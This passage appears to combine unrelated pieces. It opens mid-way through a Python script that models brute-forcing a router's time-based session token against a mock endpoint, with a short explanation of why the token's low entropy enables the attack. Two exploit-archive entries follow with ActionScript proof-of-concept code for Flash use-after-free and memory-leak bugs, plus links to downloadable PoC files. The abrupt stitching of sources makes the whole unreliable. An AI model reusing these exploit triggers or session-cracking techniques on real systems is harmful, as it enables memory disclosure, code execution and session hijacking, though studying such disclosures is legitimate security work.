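    """Effective entropy of the token given the attacker's knowledge of the login window."""
    return math.log2(keyspace_size(earliest, latest))


def brute_force(is_valid, earliest, latest):
    """Sequential stand-in for the threaded crack(): returns (token, attempts)."""
    attempts = 0
    for token in candidate_tokens(earliest, latest):
        attempts += 1
        if is_valid(token):
            return token, attempts
    return None, attempts


def make_mock_router(admin_login):
    """Constructed stand-in for the AuthMode endpoint: a cookie is a valid session
    iff it equals the token minted at the admin's login second. Returns (checker, token)."""
    admin_stok = "%s%d" % (PREFIX, int(admin_login.timestamp()))
    return (lambda stok: stok == admin_stok), admin_stok


def random_session_token():
    """What the router should have issued: 256 bits from the OS CSPRNG, nothing time-derived."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    login = datetime(2016, 9, 13, 10, 30, tzinfo=timezone.utc)   # constructed login time
    check, real = make_mock_router(login)
    earliest, latest = login - timedelta(hours=2), login + timedelta(minutes=5)
    print("keyspace: %d candidates (%.1f bits)" % (keyspace_size(earliest, latest), keyspace_bits(earliest, latest)))
    print("found %s after %d attempts" % brute_force(check, earliest, latest))
    print("unpredictable alternative:", random_session_token())
```

A window of two hours plus the counter form is under 14 bits; a single thread over the LAN exhausts it in minutes, which is why the exploit needs nothing more than an estimate of when the admin logged in.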
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
There is an info leak in the Transform.colorTransform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Transform.
A minimal PoC is as follows:
this.createEmptyMovieClip( "mc", 1);
var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
var t:Transform = new Transform( mc );
t.colorTransform = c;
this.createTextField( "tf", 2, 0, 0, 2000, 200);
var ct = ColorTransform;
var g = flash.geom;
g.addProperty("ColorTransform", func, func);
var q = t.colorTransform;
tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
function func(){
    mc.removeMovieClip();
    return ct;
}
A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40355.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a use-after-free. A minimal PoC is as follows:
var mc = this.createEmptyMovieClip( "mc", 1);
mc.addProperty( "f", func, func );
mc.f("hello");
function func(){
    mc.removeMovieClip();
    // Fix heap
    var d:Date = new Date();
    return d.getDate;
}
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40356.zip